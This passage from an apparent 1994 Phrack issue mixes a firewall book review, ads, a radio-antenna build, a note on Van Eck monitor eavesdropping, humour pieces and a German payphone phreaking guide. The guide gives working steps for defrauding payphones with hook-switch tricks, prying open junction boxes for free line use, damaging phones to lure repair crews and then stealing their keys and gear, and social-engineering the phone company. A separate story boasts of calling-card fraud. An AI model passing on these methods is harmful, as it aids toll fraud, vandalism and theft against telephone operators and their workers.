administrative functions as presented in this book, what the authors call
counter-intelligence (reverse fingers and rusers) and booby traps and fake
password file are open for ethical debate. Perhaps they are not illegal,
but counter-intelligence can surely ring the warning bells on the site being
counter-fingered if that site itself is security aware.
That said, let's move to hackers. I refer to these as "hacker studies",
or whatever, for lack of a better name. This is Part III (A Look
Back), which contains the methods of attacks (social engineering,
stealing passwords, etc), the Berferd incident (more on that later),
and an analysis (statistical and otherwise) of the Bell Labs gateway
logs.
Back to where we started, there is nothing new or innovative about
these chapters. The Berferd hacker case is not new, it is mostly just
uninteresting. The chapter is mostly a copy (they do state this) of
Bill Cheswick's paper titled "A Night with Berferd, in Which a Cracker
is Lured, Endured and Studied." The chapter concerning probes and
door-knob twisting on the Internet (Traps, Lures, and Honey Pots)
is mostly a copy (they do not state this) of Steven Bellovin's paper
titled, "There Be Dragons". What do we learn from the hacker-related
chapters? Let's take Berferd: The Sendmail DEBUG hole expert. After
mailing himself a password file and receiving it with a space after
the username, he tries to add accounts in a similar fashion. Cheswick
calls him "flexible". I might have chosen another F-word. Next are
the hacker logs. People finger. People tftp /etc/passwd. People try
to rlogin as bin. There are no advanced attacks in these sections.
Compared with the scary picture painted in the Firewalls chapter --
that of the Bad Guy spoofing hostnames, flooding DNS caches, faking
NFS packets and much more -- something must have gone wrong.(**)
Still, I cannot say that this information is totally useless. It is,
as mentioned, old. It is available and was available since 1992
on ftp://research.att.com:{/dist/internet_security,/dist/smb}. (***)
The bottom line is that this book is, in my opinion, foremost and upmost
a Firewaller's book. The hacker section could have been condensed
into Appendix D, a copy of the CERT advisory about computer attacks
("Don't use guest/guest. Don't leave root unpassworded.") It really
takes ignorance to believe that inexperienced hackers can learn "hacker
techniques" and become mean Internet break-in machines just by reading
_Firewalls and Internet Security_. Yes, even the chapter dedicated
to trying to attack your own machine to test your security (The Hacker's
Workbench) is largely theoretical. That is to say, it doesn't go above
comments like "attack NFS". The probes and source code supplied there are
for programs like IP subnet scanners and so on, and not for "high-level"
stuff like ICMP bombers or similar software; only the attacks are
mentioned, not to implementation. This is, by the way, quite
understandable and expected, but don't buy this book if you think it
will make you into some TCP/IP attacker wiz.
In summary:
THE GOOD
The Firewalls part is excellent. The other parts not related to
hacker-tracking are good as well. The added bonuses -- in the form
of a useful index, a full bibliography (with pointers to FTP sites),
a TCP port list with interesting comments and a great (running out
of positive descriptions here) online resources list -- are also
grand (whew).
THE BAD
The hacker studies sections, based on old (circa 1992) papers, are
not interesting for anyone with any knowledge of hacking and/or
security who had some sort of encounters with hackers. People without
this knowledge might either get the idea that: (a) all hackers are
stupid and (b) all hackers are Berferd-style system formatters. Based on
the fact that the authors do not make a clear-cut statement about
hiring or not hiring hackers, they just say that you should think
if you trust them, and that they generally appear not to have a total
draconian attitude towards hackers in general, I don't think this was
intentional.
THE UGLY (For the nitpickers)
There are some nasty little bugs in the book. They're not errors
in that sense of the word; they're just kind of annoying -- if you're
sensitive about things like being called a hacker or a cracker, they'll
annoy you. Try this: although they explain why they would use the term
"hacker" when referring to hackers (and not "eggsucker", or "cracker"),
they often use terms like "Those With Evil Intention". Or, comparing
_2600 Magazine_ to the Computer underground Digest.
(*) From the Firewalls FAQ <fwalls-faq@tis.com>:
``A firewall is any one of several ways of protecting one
network from another untrusted network. The actual mechanism
whereby this is accomplished varies widely, but in
principle, the firewall can be thought of as a pair of
mechanisms: one which exists to block traffic, and the other
which exists to permit traffic. Some firewalls place a
greater emphasis on blocking traffic, while others emphasize
permitting traffic.''
(**) This would be a great place to start a long and boring discussion
about different types of hackers and how security (including firewalls)
affect them. But... I don't think so.
(***) ftp://research.att.com:/dist/internet_security/firewall.book also
contains, in text and PostScript, the list of parts, chapters and
sections in the book, and the Preface section. For that reason,
those sections weren't printed here.
All the papers mentioned in this review can be found on that FTP
site.
------------------------------------------------------------------------------
Announcing Bellcore's Electronic Information Catalog for Industry
Clients...
To access the online catalog:
telnet info.bellcore.com
login: cat10
or dial 201-829-2005
annex: telnet info
login: cat10
[Order up some E911 Documents Online!]
------------------------------------------------------------------------------
TTTTT H H EEEEE
T H H E
T HHHHH EEEEE
T H H E
T H H EEEEE
CCC U U RRRR M M U U DDDD GGG EEEEE OOO N N
C C U U R R MM MM U U D D G G E O O NN N
C U U RRRR M M M U U D D G EEEEE O O N N N
C C U U R R M M U U D D G GG E O O N NN
CCC UUU R R M M UUU DDDD GGG EEEEE OOO N N
Bill Clinton promised good health care coverage for everyone.
Bill Clinton promised jobs programs for the unemployed.
Bill Clinton promised that everyone who wanted could serve in the military.
Bill Clinton promised a lot. So does the Curmudgeon.
But unlike Bill Clinton, we'll deliver...
For only $10 a year (12 issues) you'll get alternative music reviews and
interviews, political reporting, anti-establishment features and
commentary, short fiction, movie reviews, book reviews, and humor. Learn
the truth about the Gulf War, Clipper, and the Selective Service System.
Read everything you wanted to know about bands like the Offspring, R.E.M.,
the Cure, Porno for Pyros, Pearl Jam, Dead Can Dance, Rhino Humpers, and
Nine Inch Nails. Become indoctrinated by commentary that just might change
the way you think about some things. Subscribe to the Curmudgeon on paper for
$10 or electronically for free. Electronic subscribers don't get
everything that paying subscribers do like photos, spoof ads, and some
articles.
Paper: send $10 check or money order to the Curmudgeon
4505 University Way N.E.
Box 555
Seattle, Washington
98105
Electronic: send a request to rodneyl@u.washington.edu
------------------------------------------------------------------------------
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% The Journal Of American Underground Computing - ISSN 1074-3111 %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Computing - Communications - Politics - Security - Technology - Humor
-Underground - Editorials - Reviews - News - Other Really Cool Stuff-
Published Quarterly/Semi-Quarterly By Fennec Information Systems
This is one of the more popular new electronic publications. To
get your free subscription, please see the addresses below.
Don't miss out on this newsworthy publication. We are getting
hundreds of new subscriptions a month. This quarterly was promoted
in Phrack Magazine. If you don't subscribe, you're only cheating
yourself. Have a great day...and a similar tomorrow
* Coming soon * A Windows-based help file containing all of the issues
of the magazine as well as extensive bio's of all of the
editors.
Subscription Requests: sub@fennec.com
Comments to Editors : editors@fennec.com
Back issues via Ftp : etext.archive.umich.edu /pub/Zines/JAUC
fc.net /pub/tjoauc
Submissions : submit@fennec.com
Finger info : dfox@fc.net and kahuna@fc.net
------------------------------------------------------------------------------
Make the best out of your European pay telephone
by Onkel Dittmeyer, onkeld@ponton.hanse.de
-----------------------------------------------------
Okay guys and girls, let's come to a topic old like the creation
but yet never revealed. European, or, to be more exact, German pay
phone technology. Huh-huh.
There are several models, round ones, rectangular ones, spiffy
looking ones, dull looking ones, and they all have one thing in
common: If they are something, they are not what the American reader
might think of a public pay telephone, unlike it's U.S. brothers,
the German payphones always operate off a regular customer-style
telephone line, and therefore they're basically all COCOTS, which
makes it a lot easier to screw around with them.
Let's get on with the models here. You are dealing with two
classes; coin-op ones and card-op ones. All of them are made by
Siemens and TELEKOM. The coin-op ones are currently in the process
of becoming extinct while being replaced by the new card-op's, and rather
dull. Lacking all comfort, they just have a regular 3x4 keypad,
and they emit a cuckoo tone if you receive a call. The only way to
tamper with these is pure physical violence, which is still easier
than in the U.S.; these babies are no fortresses at all. Well, while
the coin-op models just offer you the opportunity of ripping off
their money by physically forcing them open, there is a lot more
fun involved if you're dealing with the card babies. They are really
spiffy looking, and I mean extraordinary spiffy. Still nothing
compared to the AT&T VideoFoNeZ, but still really spiffy. The 2-line
pixel-oriented LCD readout displays the pure K-Radness of it's
inventors. Therefore it is equipped with a 4x4 keypad that has a lot
of (undocumented) features like switching the mother into touch-tone
mode, redial, display block etc. Plus, you can toggle the readout
between German, English, and French. There are rumors that you can
put it into Mandarin as well, but that has not been confirmed yet.
Let's get ahead. Since all payphones are operating on a regular
line, you can call them up. Most of them have a sign reading their
number, some don't. For those who don't, there is no way for you to
figure out their number, since they did not invent ANI yet over here
in the country famous for its good beer and yodel chants. Well, try
it. I know you thought about it. Call it collect. Dialing 010 will
drop you to a long-distance operator, just in case you didn't know.
He will connect the call, since there is no database with all the
payphone numbers, the payphone will ring, you pick up, the operator
will hear the cuckoo tone, and tell you to fuck off. Bad luck, eh?
This would not be Phrack if there would be no way to screw it.
If you examine the hook switch on it closely, you will figure out
that, if you press it down real slow and carefully, there are two
levels at whom it provokes a function; the first will make the phone
hang up the line, the second one to reset itself. Let me make this
a little clearer in your mind.
----- <--- totally released
|
|
| <--- hang up line
press to this level --> |
| <--- reset
|
----- <--- totally hung up
Involves a little practice, though. Just try it. Dial a number
it will let you dial, like 0130, then it will just sit there and
wait for you to dial the rest of the number. Start pressing down
the hookswitch really slow till the line clicks away into suspense,
if you release it again it will return you to the dial tone and
you are now able to call numbers you aren't supposed to call, like
010 (if you don't have a card, don't have one, that's not graceful),
or 001-212-456-1111. Problem is, the moment the other party picks
up, the phone will receive a charge subtraction tone, which is a
16kHz buzz that will tell the payphone to rip the first charge unit,
30 pfennigs, off your card, and if you don't have one inserted and
the phone fails to collect it, it will go on and reset itself
disconnecting the line. Bad luck. Still good enough to harass your
favorite fellas for free, but not exactly what we're looking for,
right? Try this one. Push the hook lever to the suspension point,
and let it sit there for a while, you will have to release it a
bit every 5 seconds or so, or the phone will reset anyway. If you
receive a call while doing this, a buzz will appear on the line.
Upon that buzz, let the lever go and you'll be connected, and
the cuckoo tone will be shut up! So if you want to receive a collect
call, this is how you do it. Tell the operator you accept the charges,
and talk away. You can use this method overseas, too: Just tell your
buddy in the states to call Germany Direct (800-292-0049) and make
a collect call to you waiting in the payphone, and you save a cool
$1.17 a minute doing that. So much for the kids that just want to
have some cheap fun, and on with the rest.
Wasting so much time in that rotten payphone, you probably
noticed the little black box beneath the phone. During my, erm,
research I found out that this box contains some fuses, a standard
Euro 220V power connector, and a TAE-F standard phone connector.
Completing the fun is the fact that it's extremely easy to pry it
open. The TAE-F plug is also bypassing the phone and the charge
collection circuits, so you can just use it like your jack at home.
Bring a crowbar and your laptop, or your Pentium tower, power it over
the payphone and plug your Dual into the jack. This way you can even
run a board from a payphone, and people can download the latest
WaReZzzZzz right from the booth. It's preferable to obtain a key for
the lock of the box, just do some malicious damage to it (yes, let
the animal take control), and call Telekom Repairs at 1171 and they
will come and fix it. Since they always leave their cars unlocked,
or at least for the ones I ran across, you can either take the whole
car or all their k-rad equipment, manuals, keys, and even their lunch
box. But we're shooting off topic here. The keys are usually general
keys, means they fit on all payphones in your area. There should also
be a nationwide master key, but the German Minister of Tele-
communications is probably keeping that one in his desk drawer.
The chargecards for the card-op ones appear to have a little chip
on them, where each charge unit is being deducted, and since no-one
could figure out how it works, or how to refill the cards or make a
fake one, but a lot of German phreaks are busy trying to figure that
out.
A good approach is also social-engineering Telekom so they turn
off the charge deduction signal (which doesn't mean the call are free,
but the buzz is just not transmitted any more) so the phone doesn't
receive a signal to charge you any money no matter where you call.
The problem with this method is that the world will spread in the
neighborhood that there is a payphone where you can call for free,
and therefore it will be so crowded that you can't use it, and
the phone pals will catch up fast. It's fun though, I tried it, and
I still get free drinks at the local pub for doing it.
Another k-rad feature on them is the built-in modem that they use
to get their software. On a fatal error condition they appear to dial
a telecom number and download the latest software just how their ROM
commands them to do. We will shortly take a phone, install it some-
where else and figure out where it calls, what the protocol is and
what else is being transmitted, but that will probably be in another
Phrack.
If you found out anything that might be of interest, you are
welcome to mail it to onkeld@ponton.hanse.de using the public key
beneath. Unencrypted mail will be killed since ponton.hanse.de is
run by a paranoid bitch that reads all traffic just for the hell
of it, and I don't want the phedzZz to come and beat me over the
head with a frozen chunk o' meat or worse.
Stay alert, watch out and have fun...
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a
mQCNAize9DEAAAEEAKOb5ebKYg6cAxaiVT/H5JhCqgNNDHpkBwFMNuQW2nGnLMvg
Q0woIxrM5ltnnuCBJGrGNskt3IMXsav6+YFjG6IA8YRHgvWEwYrTeW2tniS7/dXY
fqCCSzTxJ9TtLAiMDBgJFzOIUj3025zp7rVvKThqRghLx4cRDVBISel/bMSZAAUR
tChPbmtlbCBEaXR0bWV5ZXIgPG9ua2VsZEBwb250b24uaGFuc2UuZGU+
=b5ar
-----END PGP PUBLIC KEY BLOCK-----
------------------------------------------------------------------------------
_ _ _ _
((___)) INFORMATION IS JUNK MAIL ((___))
[ x x ] [ x x ]
\ / cDc communications \ /
(' ') -cDc- CULT OF THE DEAD COW -cDc- (' ')
(U) (U)
deal with it, presents unto you 10 phat t-files, deal with it,
S U C K E R fresh for July 1994: S U C K E R
New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for July, 1994:
_________________________________/Text Files\_________________________________
261: "Interview with Greta Shred" by Reid Fleming. Reid conducts an in-depth
interview with the editor of the popular 'zine, _Mudflap_.
262: "_Beverly Hills 90210_ as Nostalgia Television" by Crystal Kile. Paper
presented for the 1993 National Popular Culture Association meeting in New
Orleans.
263: "What Color Is the Sky in Your World?" by Tequila Willy. Here's your
homework, done right for you by T. "Super-Brain" Willy.
264: "Chicken Hawk" by Mark E. Dassad. Oh boy. Here's a new watermark low
level of depravity and sickness. If you don't know what a "chicken hawk" is
already, read the story and then you'll understand.
265: "Eye-r0N-EE" by Swamp Ratte'. This one's interesting 'cause only about
half-a-dozen or so lines in it are original. The rest was entirely stuck
together from misc. files on my hard drive at the time. Some art guy could say
it's a buncha post-this&that, eh? Yep.
266: "Interview with Barbie" by Clench. Barbie's got her guard up. Clench
goes after her with his rope-a-dope interview style. Rope-a-dope, rope-a-dope.
This is a boxing reference to a technique mastered by The Greatest of All Time,
Muhamed Ali.
267: "About a Boy" by Franken Gibe. Mr. Gibe ponders a stolen photograph.
Tiny bunnies run about, unhindered, to find their own fate.
268: "Mall Death" by Snarfblat. Story about a Dumb Girl[TM]. Are you
surprised?
269: "Prophile: Future History" by THE NIGHTSTALKER. It's the future, things
are different, but the Master Hacker Dude lives on.
270: "Time out for Pop" by Malcolm D. Moore. Sad account of a hopless-pop.
__________________________________/cDc Gnuz\__________________________________
"And that no man might buy or sell, save he that had the mark, or the name
of the Cow, or the number of his name. Here is wisdom. Let him that hath
understanding count the number of the Cow: for it is the number of a man; and
his number is eight billion threescore and seven million nine hundred fourty-
four thousand three hundred threescore and two. So it is written." -Omega
Yowsah, yowsah, yowsah. JULY once again, the super-hooray month which marks
cDc's 8th year of existence. Outlasting everyone to completely rule and
dominate all of cyberspace, blah blah blah. Yeah, think a special thought
about cDc's significance in YOUR life the next time you go potty. Name your
firstborn child after me, and we'll call it karmicly even, pal. My name is
Leroy.
We're always taking t-file submissions, so if you've got a file and want to
really get it out there, there's no better way than with cDc. Upload text to
The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post
office box in Lubbock, TX. No song lyrics and bad poetry please; we'll leave
that to the no-class-havin', bottom-feeder e-shoveling orgs. out there.
News item of the month, as found by Count Zero:
"ROTTING PIG FOUND IN DITCH
VERDEN, OKLAHOMA - Responding to a tip from an employee, Verden farmer Bill
McVey found a rotting pig in a ditch two miles north of town. Farmer McVey
reported the pig to the authorities, because you cannot, legally, just leave a
dead pig in a ditch. You must dispose of your deceased livestock properly.
There are companies that will take care of this for you. As for proper
disposal of large dead animals, McVey contracts with Used Cow Dealer."
"...and the rivers ran red with the bl00d
of the Damned and the Deleted..."
-Dem0nSeed
S. Ratte'
cDc/Editor and P|-|Ear13zz |_3@DeRrr
"We're into t-files for the groupies and money."
Middle finger for all.
Write to: cDc communications, P.O. Box 53011, Lubbock, TX 79453.
Internet: sratte@phantom.com.
ALL cDc FILES LEECHABLE FROM FTP.EFF.ORG IN pub/Publications/CuD/CDC.
_____________________________________________________________________________
cDc Global Domination Update #16-by Swamp Ratte'-"Hyperbole is our business"
Copyright (c) 1994 cDc communications. All Rights Reserved.
------------------------------------------------------------------------------
===[ Radio Modification Project ]===========================================>
Tuning in to Lower Frequency Signals June 26, 1994
====================================================[ By: Grendel / 905 ]===>
The lower frequency regions of the radio spectrum are often
ignored by ham'ers, pirates, and DX'ers alike due to the
relatively little known ways of tuning in. The following article
will detail how to construct a simple-made antenna to tune in
to the LF's and show how to adjust an amateur band type radio
to receive the desired signals.
___________
\ /
\/: \/
/ . \
\_______/he lower frequency spectrum has been made to include
the very low frequency ("VLF" 2 kHz to 30 kHz) band and a
small part of the medium frequency ("MF" 300 - 500 kHz) band.
For our purposes, a suitable receiver must be able to cover
the 2 kHz to 500 kHz range as well as being calibrated at 10
kHz intervals (standard). The receiver must also be capable of
covering AM and CW broadcasts. For best capabilities, the
receiver should also be able to cover LSB ("lower side band")
and USB ("upper side band").
The Receiving System
`'`'`'`'`'`'`'`'`'`'
The receiver I use consists of a standard amateur HF ("High
Frequency") band receiver adjusted between the 3,500 and 4,000
kHz bands. This causes the receiver to act as a tuneable IF
("Intermediate Frequency") and also as demodulator. You will
also require a wideband LF ("Low Frequency") converter which
includes a 3,500 kHz crystal oscillator. See Fig. 1:
.==[ Fig 1. Block Diagram ]============================.
| _____ |
| \ANT/ |
| \./ crystal |
| | ______|______ ____________ |
| `-----| 2 - 500 kHz | | 3-4000 kHz | |
| | Converter* |--~--| IF Receiver|---OUTPUT |
| .-----|_____________| |____________| |
| | |
| GND |
|______________________________________________________|
*The converter is a circuit board type 80D/L-101/PCB
available from L.F. Engineering Co, 17 Jeffry Road,
East Haven CT, 06513 for $43 US including S & H.One
may be constructed to work with your receiver (but
at a higher price no doubt).
Phono jack plugs and sockets are used for the interconnections
throughout the receiving system and the converter and
receiver (~) are connected with RG58 coax cable of no greater
length than 4 ft.
When tuning, the station frequency is measured by deducting
3,500 kHz from the scale on the main receiver (ie. 340 kHz =
3,840 kHz on the main receiver, 120 = 3,620 kHz, 95 = 3,595
kHz, etc.)
The Ferrite End-fed Antenna
`'`'`'`'`'`'`'`'`'`'`'`'`'`
This is a small antenna designed to tune between 95 kHz and
500 kHz. It consists of a coil wound around a ferrite rod, with
a 4 ft. lead.
Materials:
o 7 7/8" x 3/8" ferrite rod
o 5" 24 SWG double cotton covered copper wire
o 2 PLASTIC coated terry clips
o a wood or plastic base (8 1/2" x .8" x .5")
o 2 standard, two-gang 500 pF tuning capacitors
o a plastic plate (preferably 2" high)
------------------------------------------------------------------------------
-- A Few Things on Van Eck's Method of Eavesdroping --
Opticon the Disassembled - UPi
Dr Wim Van Eck, was the one who developed the anonymous method for
eavesdroping computers ( and, apparently, not only ) from distance,
in the laboratories of Neher, Holland. This method is based on the
fact that monitors do transmit electromagnetic radiations. As a device,
it is not too complex and it can be constructed from an experienced
electronics phreak. It uses a simple-direction antenna which grabs
monitor signals from about 800 meters away. Simplified schematics are
available from Consumertronics.
TEMPEST stands for Transient ElectroMagnetic Pulse Emanation STandard.
It concerns the quantity of electromagnetic radiations from monitors and
televisions, although they can also be detected on keyboards, wires,
printers and central units. There are some security levels in which such
radiations are supposed to be untraceable by Van Eck systems. Those
security levels or standards, are described thoroughly in a technical
exposition called NACSIM 5100A, which has been characterized by NSA
classified.
Variations of the voltage of the electrical current, cause electromagnetic
pulses in the form of radio waves. In cathode ray tube ( C.R.T. ) devices,
such as televisions and monitors, a source of electrons scans the internal
surface and activates phosphore. Whether or not the scanning is interlaced or
non-interlaced, most monitors transmit frequencies varying from 50 to 75
Mhz per second. They also transmit harmonic frequencies, multiplies of the
basic frequencies; for example a transmitter with signal of 10 Mhz per second
will also transmit waves of 20, 30, 40 etc. Mhz. Those signals are
weaker because the transmiter itself effaces them. Such variations in the
voltage is what the Van Eck system receives and analyzes.
There are ways to prevent or make it harder for someone to monitor
your monitor. Obviously you cannot place your computer system
underground and cover it with a Faraday cage or a copper shield
( If your case is already that, then you know more about Van Eck
than I do ). What else ?
(1) Certain computers, such as Wang's, prevent such divulges;
give preference to them.
(2) Place your monitor into a grounded metal box, 1.5 cm thick.
(3) Trace your tracer(s). They gonna panic.
(4) Increase of the brightness and lowering of the contrast
reduces TEMPEST's power. Metal objects, like bookshelves,
around the room, will also help a little bit.
(5) Make sure that two or more monitors are transmitting at the same
frequency and let them operate simultaneously; this will confuse
Van Eck systems.
(6) Buy or make on your own, a device which will transmit noise
at your monitor's frequency.
(7) Act naturally. That is:
(a) Call IRC, join #hack and never mumble a single word.
(b) Read only best selling books.
(c) Watch television at least 8 hours a day.
(d) Forget altruism; there is only you, yourself
and your dick/crack.
(8) Turn the monitor off.
------------------------------------------------------------------------------
-Almost Busted-
By: Deathstar
It all started one week in the last month of summer. Only my brother
and I were at the house for the whole week, so I did whatever I wanted.
Every night, I would phreak all night long. I would be either at a payphone
using AT&Tz, or at home sitting on a conference. I would be on the phone
till at least four or five in the morning. But one night, my luck was running
thin, and I almost phreaked for the last time. I was at a payphone, using
cards. I had been there since around twelve midnight.. The payphone was
in a shopping center with a supermarket and a few other stores. Most every
thing closed at eleven.. Except for the nearby gas station. Anyway, I was
on the phone with only one person that night. I knew the card would be dead
by the end of the night so I went ahead and called him on both of his lines
with both of the payphones in the complex with the same card. I had talked
for hours. It started to get misty and hard to see. Then, I noticed a car
of some kind pulling into the parking lot. I couldn't tell what kind of
car it was, because it was so dark. The car started pulling up to me, and
when it was around twenty feet away I realized it was a police car. They
got on the loudspeaker and yelled "Stay where you are!". I dropped the
phone and ran like hell past the supermarket to the edge of the complex.
I went down a bike path into a neighborhood of townhouses. Running across
the grass, I slipped and fell about two or three times. I knew they were
following me, so I had to hide. I ran to the area around the back of
the supermarket into a forest. I smacked right into a fence and fell
on the ground. I did not see the fence since it was so dark. Crawling a
few feet, I laid down and tried to cover my body with some leaves and
dirt to hide. I was wearing an orange shirt and white shorts. I laid
as still as I could, covered in dirt and leaves. I could hear the police
nearby. They had flashlights and were walking through the forest looking
for me. I knew I would get busted. I tried as hard as I could to keep
from shaking in fear. I lay there for around thirty minutes. Bugs were
crawling around on my legs biting me. I was itching all over. I couldn't
give up though, because if they caught me I knew that would be the end
of my phreaking career. I was trying to check if they were still looking
for me, because I could not hear them. Just as I was about to make a run
for it, thinking they were gone I heard a police radio. I sat tight again.
For another hour, I lay there until finally I was sure they were gone. I
got up and started to run. I made my way through the neighborhood to my
house. Finally I got home. It was around five thirty a.m. I was filthy.
The first thing I did was call the person I was talking to on the payphone
and tell him what happened. Then, I changed clothes and cleaned myself up.
I checked my vmb to find that a conference was up. I called it, and told
my story to everyone on.
I thought that was the end of my confrontation with the police, but I
was wrong. The next day I had some people over at my house. Two or Three
good friends. One of them said that there was a fugitive loose in our
town. We were bored so we went out in the neighborhood to walk around
and waste time. Hardly anyone was outside, and police cars were going
around everywhere. One guy did leave his house but he brought a baseball
bat with him. We thought it was funny. Anyway, we soon got bored and
went back home. Watching tv, we turned to the news. They had a Report
about the Fugitive. We watched. It showed a picture of the shopping
center I was at. They said "One suspect was spotted at this shopping
center last night at around four thirty in the morning. The officer
is around ninety five percent sure that the suspect was the fugitive.
He was wearing a orange shirt and white shorts, and ran when approached."
I then freaked out. They were searching my neighborhood for a fugitive
that didn't exist! I called back the guy I was talking to the night
before and told him, and then told everyone that was on the conference
the night before. It ended up that the fugitives never even entered
our state. They were caught a week later around thirty miles from
the prison they escaped from. Now I am known by two nicknames. "NatureBoy"
because everyone says I communed with nature for a hour and a half hiding
from the police, and "The Fugitive" for obvious reasons. Anywayz, That's
how I was almost busted..
-DS
------------------------------------------------------------------------------
The following is a *true* story. It amused the hell out of me while it
was happening. I hope it isn't one of those "had to be there" things.
Copyright 1994 Captain Sarcastic, all rights reserved.
On my way home from the second job I've taken for the extra holiday ca$h I
need, I stopped at Taco Bell for a quick bite to eat. In my billfold is
a $50 bill and a $2 bill. That is all of the cash I have on my person.
I figure that with a $2 bill, I can get something to eat and not have to
worry about people getting pissed at me.
ME: "Hi, I'd like one seven layer burrito please, to go."
IT: "Is that it?"
ME: "Yep."
IT: "That'll be $1.04, eat here?"
ME: "No, it's *to* *go*." [I hate effort duplication.]
At his point I open my billfold and hand him the $2 bill. He looks at it
kind of funny and
IT: "Uh, hang on a sec, I'll be right back."
He goes to talk to his manager, who is still within earshot. The
following conversation occurs between the two of them.
IT: "Hey, you ever see a $2 bill?"
MG: "No. A what?"
IT: "A $2 bill. This guy just gave it to me."
MG: "Ask for something else, THERE'S NO SUCH THING AS A $2 BILL." [my emp]
IT: "Yeah, thought so."
He comes back to me and says
IT: "We don't take these. Do you have anything else?"
ME: "Just this fifty. You don't take $2 bills? Why?"
IT: "I don't know."
ME: "See here where it says legal tender?"
IT: "Yeah."
ME: "So, shouldn't you take it?"
IT: "Well, hang on a sec."
He goes back to his manager who is watching me like I'm going to
shoplift, and
IT: "He says I have to take it."
MG: "Doesn't he have anything else?"
IT: "Yeah, a fifty. I'll get it and you can open the safe and get change."
MG: "I'M NOT OPENING THE SAFE WITH HIM IN HERE." [my emp]
IT: "What should I do?"
MG: "Tell him to come back later when he has REAL money."
IT: "I can't tell him that, you tell him."
MG: "Just tell him."
IT: "No way, this is weird, I'm going in back."
The manager approaches me and says
MG: "Sorry, we don't take big bills this time of night." [it was 8pm and
this particular Taco Bell is in a well lighted indoor mall with 100
other stores.]
ME: "Well, here's a two."
MG: "We don't take *those* either."
ME: "Why the hell not?"
MG: "I think you *know* why."
ME: "No really, tell me, why?"
MG: "Please leave before I call mall security."
ME: "Excuse me?"
MG: "Please leave before I call mall security."
ME: "What the hell for?"
MG: "Please, sir."
ME: "Uh, go ahead, call them."
MG: "Would you please just leave?"
ME: "No."
MG: "Fine, have it your way then."
ME: "No, that's Burger King, isn't it?"
At this point he BACKS away from me and calls mall security on the phone
around the corner. I have two people STARING at me from the dining area,
and I begin laughing out loud, just for effect. A few minutes later this
45 year oldish guy comes in and says [at the other end of counter, in a
whisper]
SG: "Yeah, Mike, what's up?"
MG: "This guy is trying to give me some [pause] funny money."
SG: "Really? What?"
MG: "Get this, a *two* dollar bill."
SG: "Why would a guy fake a $2 bill?" [incredulous]
MG: "I don't know? He's kinda weird. Says the only other thing he has is
a fifty."
SG: "So, the fifty's fake?"
MG: "NO, the $2 is."
SG: "Why would he fake a $2 bill?"
MG: "I don't know. Can you talk to him, and get him out of here?"
SG: "Yeah..."
Security guard walks over to me and says
SG: "Mike here tells me you have some fake bills you're trying to use."
ME: "Uh, no."
SG: "Lemme see 'em."
ME: "Why?"
SG: "Do you want me to get the cops in here?"
At this point I was ready to say, "SURE, PLEASE," but I wanted to eat, so
I said
ME: "I'm just trying to buy a burrito and pay for it with this $2 bill."
I put the bill up near his face, and he flinches like I was taking a
swing at him. He takes the bill, turns it over a few times in his hands,
and says
SG: "Mike, what's wrong with this bill?"
MG: "It's fake."
SG: "It doesn't look fake to me."
MG: "But it's a **$2** bill."
SG: "Yeah?"
MG: "Well, there's no such thing, is there?"
The security guard and I both looked at him like he was an idiot, and it
dawned on the guy that he had no clue.
My burrito was free and he threw in a small drink and those cinnamon
things, too. Makes me want to get a whole stack of $2 bills just to see
what happens when I try to buy stuff. If I got the right group of
people, I could probably end up in jail. At least you get free food.
------------------------------------------------------------------------------
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 4 of 28
// // /\ // ====
// // //\\ // ====
==== // // \\/ ====
/\ // // \\ // /=== ====
//\\ // // // // \=\ ====
// \\/ \\ // // ===/ ====
PART II
------------------------------------------------------------------------------
The official Legion of Doom t-shirts are still available.
Join the net.luminaries world-wide in owning one of
these amazing shirts. Impress members of the opposite sex, increase
your IQ, annoy system administrators, get raided by the government and
lose your wardrobe!
Can a t-shirt really do all this? Of course it can!
--------------------------------------------------------------------------
"THE HACKER WAR -- LOD vs MOD"
This t-shirt chronicles the infamous "Hacker War" between rival
groups The Legion of Doom and The Masters of Destruction. The front
of the shirt displays a flight map of the various battle-sites
hit by MOD and tracked by LOD. The back of the shirt
has a detailed timeline of the key dates in the conflict, and
a rather ironic quote from an MOD member.
(For a limited time, the original is back!)
"LEGION OF DOOM -- INTERNET WORLD TOUR"
The front of this classic shirt displays "Legion of Doom Internet World
Tour" as well as a sword and telephone intersecting the planet
earth, skull-and-crossbones style. The back displays the
words "Hacking for Jesus" as well as a substantial list of "tour-stops"
(internet sites) and a quote from Aleister Crowley.
--------------------------------------------------------------------------
All t-shirts are sized XL, and are 100% cotton.
Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for
postage.
Send checks or money orders. Please, no credit cards, even if
it's really your card.
Name: __________________________________________________
Address: __________________________________________________
City, State, Zip: __________________________________________
I want ____ "Hacker War" shirt(s)
I want ____ "Internet World Tour" shirt(s)
Enclosed is $______ for the total cost.
Mail to: Chris Goggans
603 W. 13th #1A-278
Austin, TX 78701
These T-shirts are sold only as a novelty items, and are in no way
attempting to glorify computer crime.
------------------------------------------------------------------------------
introducing...
The PHRACK Horoscope, Summer 1994
Foreseen in long nights of nocturnal lubrication by Onkel Dittmeyer
---
Do you believe in the stars? Many do, some don't. In fact, the stars
can tell you a whole lot about the future. That's bullshit? You don't
believe it? Good. Be doomed. See you in hell. Here's the official PHRACK
horoscope for all eleet hackerz for the summer of 1994.
You can use this chart to find out your zodiac sign by your DOB.
Aquarius.....01/20 - 02/18 Leo..........07/23 - 08/22
Pisces.......02/19 - 03/20 Virgo........08/23 - 09/22
Aries........03/21 - 04/19 Libra........09/23 - 10/22
Taurus.......04/20 - 05/20 Scorpio......10/23 - 11/21
Gemini.......05/21 - 06/20 Sagittarius..11/22 - 12/21
Cancer.......06/21 - 07/22 Capricorn....12/22 - 01/19
---
oOo This summer's best combinations oOo
YOU LOVE BS VICTIM H0T WAREZ
==============================================================
Aquarius Libra Leo Sagittarius
Pisces Sagittarius Aquarius Cancer
Aries Aries Cancer Capricorn
Taurus Gemini Pisces Taurus
Gemini Cancer Aries Scorpio
Cancer Leo Virgo Gemini
Leo Scorpio Gemini Leo
